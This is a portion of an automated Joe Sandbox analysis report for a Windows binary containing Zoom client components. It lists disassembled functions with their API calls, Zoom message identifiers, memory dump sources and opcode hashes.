                • Opcode ID: 2d8c844aff0acda8c1c6954aa7f1f778f748db91d1debd7cff9971022f9f17c0
                • Instruction ID: 65f6895c6afae3122b75fc3200487f7e8f2fa2b0169e1780e726257c46ab631b
                • Opcode Fuzzy Hash: 2d8c844aff0acda8c1c6954aa7f1f778f748db91d1debd7cff9971022f9f17c0
                • Instruction Fuzzy Hash: F941E334A007049BCF14EBA4D8856DDB770AF58309F048128EC12BB391DF709E8ADBB9
                Function 00C96384 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9638B
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77090), ref: 00C9639F
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.checkupdate_response,00000044,00C77090), ref: 00C963D1
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.notify.component.checkupdate_response), ref: 00C9640E
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.notify.component.checkupdate_response,-00000004,-00000004,com.Zoom.app.notify.component.checkupdate_response), ref: 00C96440
                • EnterCriticalSection.KERNEL32(?), ref: 00C964D2
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C964EF
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.notify.component.checkupdate_response), ref: 00C96502
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.notify.component.checkupdate_response$componentType$downloadURL$latestVersion$releaseNote$result
                • API String ID: 1443623190-374637238
                • Opcode ID: 2c58cad5713a7a74aef0ecce0962090da3e7f5e3bdc3d38c3f3a6579f9cccfb4
                • Instruction ID: f5e8c9aca3a16b8e3cf82907bafb2187d9a624774277fd8c4661db9b0a2aff4d
                • Opcode Fuzzy Hash: 2c58cad5713a7a74aef0ecce0962090da3e7f5e3bdc3d38c3f3a6579f9cccfb4
                • Instruction Fuzzy Hash: B441F174E00708DBCF25EBA4C85969DB7B0AF54305F044128EC12AB3D1DF709B8ADBA9
                Function 00C9050D Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90514
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FBC0), ref: 00C90528
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response,00000044,00C6FBC0), ref: 00C9055A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response), ref: 00C90597
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response,-00000004,-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response), ref: 00C905C9
                • EnterCriticalSection.KERNEL32(?), ref: 00C9065B
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C90678
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response), ref: 00C9068B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.response$result$signalType$sourceType$txChannelID$userID
                • API String ID: 1443623190-3843896843
                • Opcode ID: db00518066c8eaf9a5315d1b6a76441b665acfcdbcce7227de7a416640542b50
                • Instruction ID: dad273852357b0a93d64dc0c8c3e57d98fe781d157ed504e0465c1e8c92f3edf
                • Opcode Fuzzy Hash: db00518066c8eaf9a5315d1b6a76441b665acfcdbcce7227de7a416640542b50
                • Instruction Fuzzy Hash: CB41EF74E007149FCF14EBA4C85969DB7B5AF88305F144118FC12AB391DF709E8AEBA9
                Function 00C88663 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8866A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69E40), ref: 00C8867E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc,00000044,00C69E40), ref: 00C886B0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C886ED
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc,-00000004,-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C8871F
                • EnterCriticalSection.KERNEL32(?), ref: 00C887B1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C887CE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.conf.notifyConfLeaveErrorDesc), ref: 00C887E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.notifyConfLeaveErrorDesc$errorDesc$errorDescLink$errorTitle$jfbType$webClientUrl
                • API String ID: 1443623190-4174090930
                • Opcode ID: 053bae247a33a91b9ba46f18af1484dfca60fba94af0dae20cf4d999149999d5
                • Instruction ID: f9c0e4a1f96ef5434fcc6c8de742d0f0d7792685444e048ec0fb09b9adba58c6
                • Opcode Fuzzy Hash: 053bae247a33a91b9ba46f18af1484dfca60fba94af0dae20cf4d999149999d5
                • Instruction Fuzzy Hash: 8A41F438E007089BCF14EBA4D84569EB7B4AF44319F144128FC12AB795DF709E8EDB69
                Function 00C8E763 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8E76A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6E730), ref: 00C8E77E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,00000044,00C6E730), ref: 00C8E7B0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E7ED
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request,-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E81F
                • EnterCriticalSection.KERNEL32(?), ref: 00C8E8B1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8E8CE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.zoom.app.assistant.virtualaudio.message.load.service.request), ref: 00C8E8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.virtualaudio.message.load.service.request$d_microphone$roomName$roomUUID$rxChannelCounts$txChannelCounts
                • API String ID: 1443623190-3337480333
                • Opcode ID: e0be99ede23e49ebf73eaedd1cd84a9ba3247231d7a60008d3ae0c6b32c1668d
                • Instruction ID: 2890690941c1f47d80f57804e13bd57d9361a468991d0c0902fff3b7f020b3a7
                • Opcode Fuzzy Hash: e0be99ede23e49ebf73eaedd1cd84a9ba3247231d7a60008d3ae0c6b32c1668d
                • Instruction Fuzzy Hash: 1D41C234E00709EFCB14EBA4D84669DB775AF44305F044128EC12AB3D1DF709A4AEB69
                Function 00C86AF0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C86AF7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68B70), ref: 00C86B0B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,00000044,00C68B70), ref: 00C86B3D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86B7A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.plistChanged,-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86BAC
                • EnterCriticalSection.KERNEL32(?), ref: 00C86C3E
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C86C5B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.conf.plistChanged), ref: 00C86C6E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: MeetingID$cmd$com.Zoom.app.conf.plistChanged$screenName$userDeviceID$userFBID
                • API String ID: 1443623190-698755778
                • Opcode ID: 4b00f43a505b96e159e2234d961f3cdc4f293ed1f63983849cf7c3a7b701bf7f
                • Instruction ID: c7f7ead6b82eae578680029c5c978920841cc21ec3043db6cce74d97781d605f
                • Opcode Fuzzy Hash: 4b00f43a505b96e159e2234d961f3cdc4f293ed1f63983849cf7c3a7b701bf7f
                • Instruction Fuzzy Hash: 6F41D074E007049BCB14EBA4D945AADB7B0EF4571AF044128EC12AB391DF709F8ADB69
                Function 00C96BFF Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C96C06
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77C00), ref: 00C96C1A
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.avatar.data.response,00000044,00C77C00), ref: 00C96C4C
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.meeting.avatar.data.response), ref: 00C96C89
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.avatar.data.response,-00000004,-00000004,com.Zoom.app.meeting.avatar.data.response), ref: 00C96CBB
                • EnterCriticalSection.KERNEL32(?), ref: 00C96D4D
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C96D6A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.meeting.avatar.data.response), ref: 00C96D7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: avatarLocalPath$avatarURL$com.Zoom.app.meeting.avatar.data.response$email$isIMContact$jid
                • API String ID: 1443623190-2158001762
                • Opcode ID: d03e61313b6896bd7fa2c2e574444e8b70934619b9006a63a883ecb89641d94c
                • Instruction ID: 47d180c6f408258930b6892c3cac1c98d691f5bbaf5fede0c11bfeac7ce93f4d
                • Opcode Fuzzy Hash: d03e61313b6896bd7fa2c2e574444e8b70934619b9006a63a883ecb89641d94c
                • Instruction Fuzzy Hash: 7641E275E007049BCF14EBA4C84969DB770AF45715F044118E822AB3D1DF709B8ADBAA
                Function 00C86D43 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C86D4A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68CF0), ref: 00C86D5E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,00000044,00C68CF0), ref: 00C86D90
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DCD
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.update.disclaimer.status,-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86DFF
                • EnterCriticalSection.KERNEL32(?), ref: 00C86E91
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C86EAE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.meeting.update.disclaimer.status), ref: 00C86EC1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Agree$MeetingID$MeetingNumber$MyScreenName$Type$com.Zoom.app.meeting.update.disclaimer.status
                • API String ID: 1443623190-1599957615
                • Opcode ID: 895fda9b914c1f5352201f76bfe0721f86de11e43df9c63673c0af34c3d16664
                • Instruction ID: 52279ba91ee09c2fcd3ea9f24f5a4899d3e0c18824ac37f5d7d202b4293b9484
                • Opcode Fuzzy Hash: 895fda9b914c1f5352201f76bfe0721f86de11e43df9c63673c0af34c3d16664
                • Instruction Fuzzy Hash: 3741E278E00704DBCF14EBA4D8456AEB771AF45319F044129EC12AB391DF309A8ADBA9
                Function 00C94D53 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94D5A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C75840), ref: 00C94D6E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.companion.token.response,00000044,00C75840), ref: 00C94DA0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.Zoom.app.conf.companion.token.response), ref: 00C94DDD
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.companion.token.response,-00000004,-00000004,com.Zoom.app.conf.companion.token.response), ref: 00C94E0F
                • EnterCriticalSection.KERNEL32(?), ref: 00C94EA1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C94EBE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.conf.companion.token.response), ref: 00C94ED1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: buddy_id$com.Zoom.app.conf.companion.token.response$dst_device_id$dst_resource_id$error$token
                • API String ID: 1443623190-2035437650
                • Opcode ID: a27eb9ec1ced54947a0bc759da08edd32270785a28bcaa24bd430b4647ef82d5
                • Instruction ID: b1d47c811eb87f230eef2c88440cdb19590eeda9f2e6ad5d450098ed9c923179
                • Opcode Fuzzy Hash: a27eb9ec1ced54947a0bc759da08edd32270785a28bcaa24bd430b4647ef82d5
                • Instruction Fuzzy Hash: 7841D575E007049BCF28EBA4C859A9EB770BF45306F044118EC12AB391DF709E4ADB69
                Function 00C8CE80 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 120COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8CE87
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CC50), ref: 00C8CE9B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,00000044,00C6CC50), ref: 00C8CECD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF0A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF3C
                • EnterCriticalSection.KERNEL32(?), ref: 00C8CFCE
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8CFEB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CFFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: CodeDetail$LineId$RespCode$RespDescription$Status$com.zoom.app.assistant.sip.onRegistrar.notification
                • API String ID: 1443623190-2011331210
                • Opcode ID: 77c378ffc28314557185823c414dd351b8590aebed3cc7fdee547ab9ad1f5ded
                • Instruction ID: 7ce9ea266d8f7cd931295cde05ea6a4faa1ae657357ec17bb3a7a056d05e9bea
                • Opcode Fuzzy Hash: 77c378ffc28314557185823c414dd351b8590aebed3cc7fdee547ab9ad1f5ded
